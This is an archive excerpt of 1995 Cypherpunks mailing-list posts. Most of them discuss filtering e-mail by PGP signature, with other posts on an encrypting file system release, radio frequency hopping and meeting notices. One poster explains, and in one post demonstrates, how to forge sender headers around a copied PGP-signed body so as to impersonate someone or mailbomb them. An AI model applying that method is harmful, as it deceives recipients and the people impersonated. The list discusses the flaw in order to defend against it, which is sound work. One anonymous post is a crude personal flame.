e-mail that looked like this: ----------------------------------------------------------------------- From: Bob To: Carol Date: 25 Dec 1965 Subject: Carol, we're history Message-ID: <111 at bob> ----BEGIN PGP SIGNED MESSAGE---- I no longer wish to go out with you. Merry Christmas! ----BEGIN PGP SIGNATURE---- Version 2.6.2 12341234... ----END PGP SIGNATURE---- "Ask not what your country can do to you, but what you can do to your country" ----------------------------------------------------------------------- Carol can *easily* forge an e-mail to Alice that looks like this: ----------------------------------------------------------------------- From: Bob To: Alice Date: 25 Dec 1995 Subject: Alice, we're history Message-ID: <222 at bob> ----BEGIN PGP SIGNED MESSAGE---- I no longer wish to go out with you. Merry Christmas! ----BEGIN PGP SIGNATURE---- Version 2.6.2 12341234... ----END PGP SIGNATURE---- "Sex with Carol was the greatest sex I've ever had" ----------------------------------------------------------------------- The e-mail is sent by Carol, but the RFC 822 header says "From: Bob". If you think this is hard to accomplish, take a look, e.g., at the source code the Lance Cotrell's mixmaster and see how it talks to sendmail. The PGP-signed portion is copied verbatim from an authentic message. Alice _may_ notice that the _Received:_ headers are weird, but this forgery will certainly pass through a script that checks signatures. E.g., this trick could be used to mailbomb someone with many copies of the same authentic e-mail. That's because PGP only signed a portion of the body, not the important headers like "Date:", "To:", "Subject:", and "Newsgroups:", nor the .sig. Happy holidays, --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From grafolog at netcom.com Mon Dec 25 10:00:27 1995 From: grafolog at netcom.com (Jonathan Blake) Date: Tue, 26 Dec 1995 02:00:27 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: <199512251710.JAA08899@slack.lne.com> Message-ID: Erik: On Mon, 25 Dec 1995, Eric Murray wrote: > > On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote: > Ok. If I want to get my email ad for the Ronco turnip-twaddler past a filter > like that, all I need to do is to create a PGP key with > a user name that's the same as one that the victim already > receives. > > i.e. if I know that joe at blort.com exchanges email with phred at none.net, then > I just create a PGP key with the name "phred at none.net", and sign > the turnip-twaddler ad with that. It'd have a valid signature, and > one coming from Joe's friend phred. Mail accepted. But will the signature match that of phred at none.net's PGP key. I doubt it. > In addition to checking for a valid signature, the filtering software > would have to also check the PGP key id of the key used. It would To check a signature, you need the public key the signature was created with. You allready have phred at none.net's public key on your keyring. If that key does not demonstrate an authentic signature for the messge, then the message is a fake. Now, if you assume that your keyring has been compromised, then you can also check the signatures of who signed the keys. At a minimu, your signature should be on the authentic key. If it is missing, then you can place the message in a "suspected to be forged bin", or just send it to dev/null, unread. > also need to make sure that there is ONLY PGP-signed content in the > mail. Otherwise Mallet could grab an innocuous mail message that I hadn't thought of that, but here is one solution. Run a perl script that automatically deletes everything that is not signed by pgp, with the exception of the date, the sender, and the subject line. > I'm sure there's other caveats, these are just the ones I can think of now. Let's figure out some more threat models. And how to counter them. Man in the middle --- he has your public key, joe at none.net's public key, and access to both your pbulic ring, and joe at none.net public ring. I don't know know how to counter this one using filters with perl --- yet. xan jonathon grafolog at netcom.com **************************************************************** Opinions represented are not necessarilly mine. OTOH, they are not representations of any organization I am affiliated with, either. WebPage: ftp://ftp.netcom.com/gr/graphology/home.html For a good prime, call 391581 * 2^216193 - 1 ********************************************************************** From adam at lighthouse.homeport.org Mon Dec 25 10:20:32 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 26 Dec 1995 02:20:32 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: Message-ID: <199512251754.MAA01460@homeport.org> Dr. Dimitri Vulis wrote: | I said, Carol can *forge* the RFC 822 header, so her e-mails look like they | came from Bob, and use the body from Bob's authentic PGP-signed message. Yes, this is possible. No, I'm not going to take the time to write a fix now, but, we both know its not tough to prevent. Take the hash of the pgp signed message, use it to filter on. I'll occaisonally add text outside a signature (literally, a postscript), so filtering out everything outside the signed text is a bad idea. You might get a few spams, but not hundreds. Its tough to ensure that mail always has an envelope that matches the key. I still use a key that say adam at bwh.harvard.edu, but most of my mail is signed with an adam at homeport.org key. Cryptography can't solve social problems. It can, however, transform them into tougher problems for the anti-social. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From adam at lighthouse.homeport.org Mon Dec 25 10:28:37 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 26 Dec 1995 02:28:37 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: Message-ID: <199512251804.NAA01482@homeport.org> Jonathan Blake wrote: | > also need to make sure that there is ONLY PGP-signed content in the | > mail. Otherwise Mallet could grab an innocuous mail message that [...] | > I'm sure there's other caveats, these are just the ones I can think of now. | | Let's figure out some more threat models. And how to counter | them. | | Man in the middle --- he has your public key, joe at none.net's | public key, and access to both your pbulic ring, and | joe at none.net public ring. I don't know know how to counter | this one using filters with perl --- yet. The real threat model that Dimitri seems to be worried about is spammers, so lets address them. There are two types of spammers, commercial and personal. The commercial spammer wants to get messages into hundreds or thousands of mail boxes. The effort to do this, per mailbox, needs to be very low, or they go for people with worse filters. The personal spammer is more difficult, since they seek specifically to annoy you, and can thus be expected to expend more effort. They can possibly get a copy of each signed message that comes to you, but of course, you can cache filter them. A problem occurs if they can get their spam to you before the legit message, in which case you need to wade through tripe to get to the real message. The personal spammer is a social problem, and I recommend using social methods to fix it. An auto-responder that says "Please grow up" might do the trick. -- "It is seldom that liberty of any kind is lost all at once." -Hume From grafolog at netcom.com Mon Dec 25 10:33:58 1995 From: grafolog at netcom.com (Jonathan Blake) Date: Tue, 26 Dec 1995 02:33:58 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: Message-ID: Dr Dimitri Vulis: On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote: > Jonathan Blake writes: > > On Mon, 25 Dec 1995, Dr. Dimitri Vulis wrote: > > > I'll be delighted if someone convinces me that I'm wrong about this. > I may even start using PGP signatures. :) When I get the bugs out of the procmail script I'm writing, to accomplish this, I'll send it to you. > I said, Carol can *forge* the RFC 822 header, so her e-mails look like they > came from Bob, and use the body from Bob's authentic PGP-signed message. Strip out everything that is not header information, and is not signed with pgp. You could even strip out all header information, except for who sent the message. That you need, so you know who to respond to. > The e-mail is sent by Carol, but the RFC 822 header says "From: Bob". > If you think this is hard to accomplish, take a look, e.g., at the source Forged signatures are not that difficult to accomplish. > The PGP-signed portion is copied verbatim from an authentic message. This is a good point. However, won['t most messages have the name of the intended recipient inside the PGP signature lines? Regardless, you've stated a weakness that I hadn't realized existed. > Alice _may_ notice that the _Received:_ headers are weird, but this > forgery will certainly pass through a script that checks signatures. I'll have to give this some thought. Have the script match the from id, with the message id. << Not sure how I can do this one, yet. >> > That's because PGP only signed a portion of the body, not the important > headers like "Date:", "To:", "Subject:", and "Newsgroups:", nor the .sig. The Header won't be signed by PGP. That part I will concede. The signature might be signed by PGP, depending on what one is using to read & respond to email with. With SLMR can sign signatures. << Granted, it is for DOS, and is geared towards FidoNet conferences. And I had to right a batch file to call the editor, then the program to attach the signature, then sign the thing. But the signature was included in the signed part of the pgp message. >> xan jonathon grafolog at netcom.com **************************************************************** Opinions represented are not necessarilly mine. OTOH, they are not representations of any organization I am affiliated with, either. WebPage: ftp://ftp.netcom.com/gr/graphology/home.html For a good prime, call 391581 * 2^216193 - 1 ********************************************************************** From tallpaul at pipeline.com Mon Dec 25 12:06:04 1995 From: tallpaul at pipeline.com (tallpaul) Date: Tue, 26 Dec 1995 04:06:04 +0800 Subject: Only accepting e-mail from known parties Message-ID: <199512251933.OAA14735@pipe8.nyc.pipeline.com> How about one-time electronic stamps. I generate a large-ish number of long-ish random numbers. I store these into a data base on my system. I send one e-stamp to all of the people I want to communicate with and vice versa. Each person uses the e-stamp in the header or some other area of their message to me easily accessible to my mail bot. My bot reads the e-stamp and then checks the data base to see if the stamp is valid. If not, then /dev/null. If so, then: a) send the message to me; b) delete the used e-stamp from the data base; c) send a confirmation of received message with a new e-stamp in it. Thoughts? (I see one problem with this but it should be able to be worked out once the basic method is agreed to). --tallpaul From DMiskell at envirolink.org Mon Dec 25 12:16:04 1995 From: DMiskell at envirolink.org (Daniel Miskell) Date: Tue, 26 Dec 1995 04:16:04 +0800 Subject: bashing (fwd) Message-ID: <9512251936.AA29575@envirolink.org> Allan, shut the hell up. This thread is truely unnecessary, can we just let it die? Munster --- _________________________________ *!Cheese Doctrine:!* Though cultured over time, and aged to perfection, one must not yield to produce mold. One must also not belittle themselves by conforming to the "whiz", but melt over the unprocessed ideas of Ghuda. _________________________________ From adam at lighthouse.homeport.org Mon Dec 25 12:32:19 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 26 Dec 1995 04:32:19 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: <199512251933.OAA14735@pipe8.nyc.pipeline.com> Message-ID: <199512251953.OAA01614@homeport.org> The basic problem is that (personal) spam is a social, not a technical problem. If someone wants to annoy you via the internet, they can do so. You can raise the cost of their annoying you, but you need to be careful not to make it difficult to talk to you. Stamps are an annoying solution unless the stamp buys the sender something that the sender wants (perhaps such as pseudononymity). It would seem that only accepting signed mail, and caching the hash of the signed part would work pretty well, and also not require anything (other than a signature) from the remote end. The cost of a spam is the time to generate a new key pair. (You probably need some way to add new keys, for people to be able to say 'I'd like to talk to you.') Adam | If not, then /dev/null. If so, then: | | a) send the message to me; | b) delete the used e-stamp from the data base; | c) send a confirmation of received message with a new e-stamp in it. | | Thoughts? (I see one problem with this but it should be able to be worked | out once the basic method is agreed to). -- "It is seldom that liberty of any kind is lost all at once." -Hume From tallpaul at pipeline.com Mon Dec 25 12:43:36 1995 From: tallpaul at pipeline.com (tallpaul) Date: Tue, 26 Dec 1995 04:43:36 +0800 Subject: Only accepting e-mail from known parties Message-ID: <199512252009.PAA18246@pipe8.nyc.pipeline.com> On Dec 25, 1995 14:53:19, 'Adam Shostack ' wrote: > The basic problem is that (personal) spam is a social, not a >technical problem. If someone wants to annoy you via the internet, >they can do so. You can raise the cost of their annoying you, but you >need to be careful not to make it difficult to talk to you. > I agree in many ways. On a personal level, I am far more interested in the *social* are of this form of privacy. It is more a problem of the data-hermit than privacy. And in a society increasingly generating narcissistists, I see the problem getting worse. Negroponte of the MIT Media Lab can sing the praises of the personal e-newspaper with personal filters to cut out everything uninteresting while culling the world new feeds for desired information. I see this feeding into the narcissitism problem. E.G. Imagine two people who "feel" that members of the other gender are "only interested in one thing." Each wakes up in the morning and looks at their personal e-paper. She reads nothing of particularly nasty rapes, serial rapists at large, rapists who have been convicted, and rapists who an uncaring pro-male system has let out to rape again (i.e. been found not guilty). He reads nothing of particularly nasty robberies of men by women, serial robberies by prostitutes, female robbers who have been convicted, and robbers who an uncaring pro-female system has let out to rob again. Both believe that their custom filtered feeds are the *real* events going on in the world and are far more accurate than any non-customized news feed. I hope nobody takes this as a generic attack on the privacy issues that the list is devoted to. I am a great supporter of privacy and pro-privacy tek. But I see myself as a realist on privacy issues, not as a privacy-utopian or a privacy-dystopian. We live in a post-Faustian world. It is divided into two groups of people. First are those who understand the post-Faustian character and devote themselves to getting used to it and even having fun with the new opportunities while understanding that the new world also generates new problems (like furthering data-narcicism). Second are those classic-reactionary forces (from all parts of the political spectrum) who whine about how the post-Faustian world is personally unfair to them and how everybody in the world has a personal obligation to them to move the world back to its pre-Faustian origins. --tallpaul PS to Tim May: I understand your posts on material that is off-topic. I usually agree with your posts. But I see the issues I discussed above as far more on topic (even if highly mediated) than, say, the ongoing discourse on the differences between an Army Captain and a Navy Captain. From rah at shipwright.com Mon Dec 25 13:38:00 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Dec 1995 05:38:00 +0800 Subject: Future Scenarios for e$: The DCSB Forecast Message-ID: -----BEGIN PGP SIGNED MESSAGE----- **************>>>>>> Meeting Reminder: One week to go! <<<<<<*********** ****>>>>>> Checks due to Shipwright *this* Saturday, December 30, 1995 <<<<<<** The Digital Commerce Society of Boston (Formerly The Boston Society for Digital Commerce) Presents Art Hutchinson and John Kelly Northeast Consulting Resources Inc., (NCRI) "Future Scenarios for e$: The DCSB Forecast" Tuesday, January 2, 1995 12 - 2 PM The Downtown Harvard Club of Boston One Federal Street, Boston, MA I've been talking to Art Hutchinson last week, and it looks like we're in for a treat. This is going to be particularly useful, coming as it does at the beginning of the new year. He and John Kelly are going to put our prognostication skills through their paces with what amounts to a 90's version of Delphi exercise, using us, a bunch of people who, if anyone, should have an interesting take on where commerce on the internet is going in the next few years. I'm psyched. Art and John are old pros at this kind of thing, so I expect this is going to be great fun. Since we're going to be doing something different besides listening to a speaker this time, I'd like to suggest that we get there right at 12 noon to get things started immediately, New Year's aldehyde toxcicity notwithstanding. ;-). Instead of one big group around a table, we'll be sitting at smaller tables with a pile of future "events" to prognisticate about. Our opinions about the likelihood about those events will be recorded by a "scribe" at each table, and then posted for all to look at during/after lunch. The "events" are drawn from a giant database of these things that NCRI has acquired over the years, filtered down to e$-relevance, plus some suggestions from the stuff we've discussed on the dcsb list and at monthly meetings. This meeting of the Boston Society for Digital Commerce will be held on Tuesday, January 2, 1995 from 12pm - 2pm at the Downtown Branch of the Harvard Club of Boston, One Federal Street. The price for lunch is $27.50. This price includes lunch, room rental, and the speaker's lunch. ;-). The Harvard Club *does* have a jacket and tie dress code. We need to receive a company check, or money order, (or if we *really* know you, a personal check) payable to "The Harvard Club of Boston", by *this* Saturday, December 30 , or you won't be on the list for lunch. We're trying to hold the line on advance registration this time, because the holiday makes for considerable uncertainty in reservations. I will be sending confirmations early this time, on Thursday, just to make sure. Checks payable to anyone else but The Harvard Club of Boston will have to be sent back. Checks should be sent to Robert Hettinga, c/o The Shipwright Development Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they must be made payable to "The Harvard Club of Boston". If anyone has questions, or has a problem with these arrangements (We've had to work with glacial A/P departments more than once, for instance), please let us know via e-mail, and we'll see if we can work something out. Planned speakers for the following few months are: February Fred Hapgood Freelance Author March Glenda Barnes X.9 Electronic Commerce Security Group April Donald Eastlake CyberCash May Perry Metzger Security Consultant and Cypherpunk June Dan Shutzer FSTC We are actively searching for future speakers. If you are in Boston on the first Tuesday of the month, and you would like to make a presentation to the Society, please send e-mail to the DCSB Program Commmittee, care of Robert Hettinga, rah at shipwright.com . For more information about the Boston Society for Digital Commerce, send "info dcsb" in the body of a message to majordomo at ai.mit.edu . If you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a message to majordomo at ai.mit.edu . Looking forward to seeing you there! Cheers, Robert Hettinga Moderator, The Digital Commerce Society of Boston -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMN8PKfgyLN8bw6ZVAQGC4AP/fSCT1Fxxa/Q8x5ujQNeN6rk8tWtt2K2c S63F3ff3FJ6lbqAQLEZiXcbyYJSMDeZt0+3vSckKG54xa3dz/e+a9K7e3eE+jdrF tZRvwYMvH2X3CKszVbh++I9cO8MlJfTgrMJc4GZKEpdfl0qxuQpz5YPqU9uIS3SL mgJ5nqn7iew= =fTao -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From mab at research.att.com Mon Dec 25 13:43:09 1995 From: mab at research.att.com (Matt Blaze) Date: Tue, 26 Dec 1995 05:43:09 +0800 Subject: New release (v1.3.2) of CFS encrypting file system available Message-ID: <199512252112.QAA07556@nsa.tempo.att.com> [Perhaps this isn't the best time for me to post this here; apologies in advance if this sparks another flame fest. -matt] Source code for the latest version (release 1.3.2) of CFS, the Cryptographic File System, is now available upon request for research and experimental use in the US and Canada. CFS pushes encryption services into the Unix(tm) file system. It supports secure storage at the system level through a standard Unix file system interface to encrypted files. Users associate a cryptographic key with the directories they wish to protect. Files in these directories (as well as their pathname components) are transparently encrypted and decrypted with the specified key without further user intervention; cleartext is never stored on a disk or sent to a remote file server. CFS employs a novel combination of DES stream and codebook cipher modes to provide high security with good performance on a modern workstation. CFS can use any available file system for its underlying storage without modification, including remote file servers such as NFS. System management functions, such as file backup, work in a normal manner and without knowledge of the key. CFS runs under SunOS and several other BSD-derived systems with NFS. It is implemented entirely at user level, as a local NFS server running on the client machine's "loopback" interface. It consists of about 5000 lines of code and supporting documentation. You must have "root" access to install CFS. CFS was first mentioned at the work-in-progress session at the Winter '93 USENIX Conference and was more fully detailed in: Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM Conference on Computer and Communications Security, Fairfax, VA, November 1993. (PostScript available by anonymous ftp from research.att.com in the file dist/mab/cfs.ps.) and in Matt Blaze. "Key Management in an Encrypting File System", Proc. Summer '94 USENIX Tech. Conference, Boston, MA, June 1994. (PostScript available by anonymous ftp from research.att.com in the file dist/mab/cfskey.ps.) Version 1.3 of CFS also includes ESM, the Encrypting Session Manager. ESM provides shell-to-shell encrypted sessions across insecure links and requires no OS or network support. It is useful for typing cfs passphrases when logged in over the network. ESM needs RSAREF 2.0 to compile and is tested only on SunOS and BSDI. ESM is the first released part of a suite of session encryption tools that are described in Matt Blaze and Steve Bellovin. "Session-layer Encryption." Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995. (PostScript is available from ftp://research.att.com/dist/mab/sesscrypt.ps) The new version of CFS differs from the version described in the papers in a few ways: * The DES-based encryption scheme has been strengthened, and now provides greater security but with the online latency of only single-DES. * Support for the smartcard-based key management system is not included and a few of the tools are not included. * An impoved key management scheme now allows chaning the passphrase associated with a directory. * The performance has been improved. * The security of the system against certain non-cryptanalytic attacks has been improved somewhat. * User-contributed ports to a number of additional platforms. * Hooks for adding new ciphers. * 3-DES, MacGuffin, and SAFER-SK128 encryption options. * Timeout options allow automatic detach of encrypted directories after a set time or period of inactivity. CFS is distributed as a research prototype; it is COMPLETELY UNSUPPORTED software. No warranty of any kind is provided. We will not be responsible if the system deletes all your files and emails the cleartext directly to the NSA or your mother. Also, we do not have the resources to port the software to other platforms, although you are welcome to do this yourself. The software was developed under SunOS and BSDI, and there are also unsupported user-contributed ports available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix. We really can't promise to provide any technical support at all, beyond the source code itself. We also maintain a mailing list for CFS users and developers; subscription information is included with the source code. Because of export restrictions on cryptographic software, we are only able to make the software available within the US and Canada to US and Canadian citizens and permanent residents. Unfortunately, we cannot make it available for general anonymous ftp or other uncontrolled access, nor can we allow others to do so. Sorry. Legal stuff from the README file: * Copyright (c) 1992, 1993, 1994, 1995 by AT&T. * Permission to use, copy, and modify this software without fee * is hereby granted, provided that this entire notice is included in * all copies of any software which is or includes a copy or * modification of this software and in all copies of the supporting * documentation for such software. * * This software is subject to United States export controls. * * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. If you would like a copy of the CFS source code, please read to the end of this message and then send email to: cfs at research.att.com DO NOT REPLY DIRECTLY TO THIS MESSAGE. You must include a statement that you are in the US or Canada, are a citizen or legal permanent resident of the US or Canada, and have read and understand the license conditions stated above. Be sure to include an email address in a US- or Canada-registered domain. The code will be sent to you via email in a "shar" shell archive (a little over 300K bytes long). From die at pig.die.com Mon Dec 25 14:55:52 1995 From: die at pig.die.com (Dave Emery) Date: Tue, 26 Dec 1995 06:55:52 +0800 Subject: FH radios In-Reply-To: <30de2109.16381795@smtp.ix.netcom.com> Message-ID: <9512252206.AA10260@pig.die.com> > > On Sat, 23 Dec 1995 08:20:28 -0800, Steven Weller wrote: > > > Thus in a frequency-hopping radio you can push the retuning (read RF > > phase-locked loop) technology to its limit and build transmitters and > > receivers around them. These typically hop in the order of 100 times a > > second. The adversary has to find the uncorrelated signal very quickly > > indeed *and* have PLL technology at least as good as yours to recover > > anything from it. Finding the signal generally means listening to all > > frequencies at once, requiring huge amounts of hardware parallelism and/or > > realtime computing power. Once you throw ten or so radios onto the same > > band, it's no longer any use looking for the strongest signal, making that > > approach useless. > > This is nowhere near the limit of the technology. 15 years ago, I was > working on PLLs that would stabilize within a couple degrees of final > phase within 3.5 microseconds. That permits you to do useful work at > 100,000 hops per second. > There is also a newer technology called direct digital synthesis or DDS that works by accumulating phase (adding to the previous value) each tick of a high frequency clock in a register at a rate determined by the contents of another register (the value here sets the frequency) with the upper bits of the accumulated phase being used to address a sine/cosine lookup table rom which in turn feeds digital output values into a D/A converter. The output of the D/A converter is a sampled approximation of a sine or cosine wave at a frequency set by the increment register. The sample rate is set by the high frequency clock rate. DDS permits instanteous frequency shifts with phase continuous output by simply reloading the phase increment register with another value. Unlike phase locked loop synthesizers a there is no transient phase and frequency error after a frequency shift. The primary limitation of DDS is set by the speed of the rquired digital hardware (and various subtler considerations such as clock jitter and output filtering) - current VLSI implementations work up to around 100 mhz with .1 hz or better frequency resolution. And with a bit more sophistication the DDS principle can be used to digitally generate vector modulation (BPSK, QPSK, QAM etc) and even digitally filter the result with FIR filters to limit occupied bandwidth. There have even been some experiments with generating broadcast FM stereo signals directly from digital music samples using this technology. But to get back to the original point of this thread - while such techniques are possible (as is full hard encryption), it is my understanding that actual conusmer 900 mhz digital cordless phones that use frequency hopping use a very limited set of frequencies and a small set of fixed hopping patterns and don't hop very fast. There is certainly little additional cost to building a trully secure digital cordless phone given the dense ASIC technology that is standard in this kind of product - but someone has to persuade the manufacturers that there is a real need and find a way to allow them to export the product. When the brand of cordless phones that most emphasizes security from eavesdropping in its point of sale advertising display is the one that uses open FM with simple speech inversion you know there is something wrong, particularly when the company that makes it is a pioneer in really secure digital speech over handheld radios (and a big governmeent contractor). Dave Emery N1PRE From nobody at REPLAY.COM Mon Dec 25 15:48:00 1995 From: nobody at REPLAY.COM (Anonymous) Date: Tue, 26 Dec 1995 07:48:00 +0800 Subject: corporate bashing Message-ID: <199512252215.XAA07650@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Fred seems to have been slipping through my filters in recent days. Though I usually trash any message containing a reference to him, I thought that this latest escalation into the ionosphere of net-sillies begs to be brought to heel... On 24 Dec 95 at 17:20, Fred Cohen wrote: > and that anonymity should be used as an escape from > responsibility for what they do and say. If you want to > remain free to speak your mind, you have to become > responsible in at least two ways: > > 1 - You must top slandering people. > 2 - You must stop using anonymity as a way to avoid being > responsible. > > When I say must, I am not intending to mean anything less. > If the cypherpunks continue to do these two things, they will > rapidly find that they are doing more to destroy all of our > rights to free speech in the Internet than they ever did to > encourage freedom of expression. There are several things wrong with this, but first, just on the surface: Fred has now dropped his cyberdrawers and stands before us displaying the ugly engine of his manhood, the handle by which he maintains a grip on his pointless existence. He reveals himself to be yet another in that small, tired parade of self-appointed lightning rods -- people with so little of import in their lives that they have to resort to trolling for what they can claim are offenses against them, then flex the borrowed, imagined musculature of mindless law to rise in self-righteous threats of exercise of vindictive wrath. This is worse than "My big brother will kick your ass!" It is like a 90-pound weakling going to the beach with a large but retarded cousin in tow. The idea is to troll to get sand kicked in his face, then to point to the drooling cousin and use him as a lever to gain and exercise control over the hapless dupes of the ruse. Freds have existed on BBS's, and before the technological age in most small clubs and societies. In the Internet they show up in newsgroups and on mailing lists, and when crossed they ALWAYS descend to threats of legal action. So predictable, so utterly dull and unimaginative, they are like the party guest who has that inappropriate laugh, who doesn't seem to notice that pairs of people are together, who approaches people oddly and, in the end, makes a scene and reveals himself to be a complete fruitcake. Unmoderated fission looking for a place to fulminate. Fred, you've come to the wrong place. If you want to be ignored, just pack your terminal and stay home with the sitcoms. Noone asked you to interject your trolls and threats here. You invited yourself, and whatever you are suffering is of your own creation. Speaking of Freds brings me to a more interesting aspect of this nonsense: How do we know there is only one Fred? Fred doesn't sign his messages... oh-oh. This attack of deja vu feels like I've had it before. Why do I get the feeling that Fred is about to embarrass himself terribly by blurting out some of the poison that fills his soul? Let him who hath not slandered cast the first suit. We Jurgar Din (that will have to suffice: I do not yet live in a free country) +"The battle, Sir, is not to the strong alone. It is to the+ +vigilant, the active, the brave. Besides, Sir, we have no + +election. If we were base enough to desire it, it is now + +too late to retire from the contest." -Patrick Henry 1775 + -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMN8TVEjw99YhtpnhAQFDngH/cTzEDHzxYZ7Z9jOmoALxaIdxpgpvlIr+ /zsZndz1KfQlqUunH5i7YsJS7tm/XOsrRcWQgKQEr9WaI8wRgrqh5g== =Hl/v -----END PGP SIGNATURE----- From mpd at netcom.com Mon Dec 25 15:49:12 1995 From: mpd at netcom.com (Mike Duvos) Date: Tue, 26 Dec 1995 07:49:12 +0800 Subject: Encryption Discrimination from Sun Message-ID: <199512252216.OAA09495@netcom2.netcom.com> I was just browsing through the rules for the million dollar contest just announced by Sun Microsystems to encourage the writing of killer applets in Java, Sun's new architecture- independent program format. The URL is http://javacontest.sun.com/rules/index.html in case anyone is interested. While reading the contest rules, I found the following one particularly interesting... "No entries may include encryption as a feature or part of an applet." This was made even more curious by the later revelation that one of the criteria for judging entries was... "The applet should be able to transfer information from one point to another, with no possibility of interception or other interference during the process." Doubtless the reason Sun nixed encryption is because this is an international contest, and they did not want to deal with legal hassles involving international borders and different laws in every country. Nonetheless, they seem to have missed an excellent opportunity to encourage the migration of privacy software into the new realm they are creating. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From jya at pipeline.com Mon Dec 25 16:16:44 1995 From: jya at pipeline.com (John Young) Date: Tue, 26 Dec 1995 08:16:44 +0800 Subject: Bidzos on C-Span 2 Message-ID: <199512252241.RAA26805@pipe4.nyc.pipeline.com> If you care, Jim is smoothly hawking a beautiful world of easy-going crypto on C-Span 2, at least in NYC at 5:35 PM. At a session in San Francisco, probably a recording. Jingle jangle. From grafolog at netcom.com Mon Dec 25 16:22:32 1995 From: grafolog at netcom.com (NOT Jonathan Blake) Date: Tue, 26 Dec 1995 08:22:32 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: Message-ID: (No, this is not Jonathan Blake; see .sig below :) Jonathan Blake writes: > When I get the bugs out of the procmail script I'm > writing, to accomplish this, I'll send it to you. I'd be very interested. I may even use it, if it works. :) I like Adam Shostak's suggestion regarding caching hashes of signed portions of incoming e-mail. If the filter is going to keep track of e-mail history, then another possible useful feature would be to limit the number of e-mails accepted from a given party (even distinict). "You mail is being returned to you because you're only authorized to send 10 e-mails here in a 24-hour period". Heh. > However, won['t most messages have the name of the intended > recipient inside the PGP signature lines? Not necessarily. Most e-mails say something like "Dear Alice," but not all. I wish the important headers were included in the signed portion. Here's another variant of the same attack: Bob sends Alice a PGP-signed e-mail. Alice posts a Usenet forgery, making it look like it came from Bob, and using the same PGP-signed body. > > Alice _may_ notice that the _Received:_ headers are weird, but this > > forgery will certainly pass through a script that checks signatures. > > I'll have to give this some thought. Have the script > match the from id, with the message id. << Not sure > how I can do this one, yet. >> It's a piece of cake to forge the message-id to match the forged "From:". In fact, I'll do just that in this article, and I bet it'll take me less than a minute. Besides, your message-id doesn't match your host. :) I'm off to teach C++ now. (Yes, on Xmas) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jya at pipeline.com Mon Dec 25 16:24:22 1995 From: jya at pipeline.com (John Young) Date: Tue, 26 Dec 1995 08:24:22 +0800 Subject: Bidzos Coda Message-ID: <199512252256.RAA27240@pipe4.nyc.pipeline.com> The Bidzos show was recorded 12/8/95 at the Commonwealth Club in SF. It finished here at about 5:45 PM. Only caught a piece. Jim was answering written questions about a range of crypto and Internet security issues from the audience. Among other things, he says they're working on an encryption program "closely tied to the OS of portables, to protect the data if the machine is lost or stolen." He also said, "don't throw tomatoes," but they're doing something with "private key escrow" for those who want to provide access to their encrypted material in case of death or other emergency. Maybe some other idle sinner saw more, or was at the realtime tomato-chucker. From rah at shipwright.com Mon Dec 25 16:36:08 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Dec 1995 08:36:08 +0800 Subject: Bidzos on C-Span 2 Message-ID: At 5:41 PM 12/25/95, John Young wrote: >If you care, Jim is smoothly hawking a beautiful world of >easy-going crypto on C-Span 2, at least in NYC at 5:35 PM. Actually, he did a pretty good job of towing the er, party line. Lots of good opportunities for analogical heavy lifting in arguments with statists. "Suppose you had a very strong door which protected your whole house and made it inviolate. Suppose then the government then wanted to have copy of your door keys on the off-chance you turn into a crack dealer someday...", etc. Except for the fact that he wants Uncle to protect his patents, that is... ;-). This was done on December 8 at the Commonwealth Club in SFO. Were there c'punks there? The questions sounded like it... He also said something about some kind of magic badge with biometric/PK software which would allow you to work anywhere there was a network connection. Reminiscent of our discussions about Xerox PARC's ubiquitous computing stuff, Gerry O'Neil's 2081, etc. I feel a rant coming on about this "information toaster" stuff, Metcalfe's fight with Alsop in Infoworld, etc. Guess I'll start it tomorrow. Take cover everybody... Merry Christmas! Cheers, Bob ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rah at shipwright.com Mon Dec 25 16:36:41 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Dec 1995 08:36:41 +0800 Subject: (cpx) Re: Bidzos on C-Span 2 Message-ID: At 5:41 PM 12/25/95, John Young wrote: >If you care, Jim is smoothly hawking a beautiful world of >easy-going crypto on C-Span 2, at least in NYC at 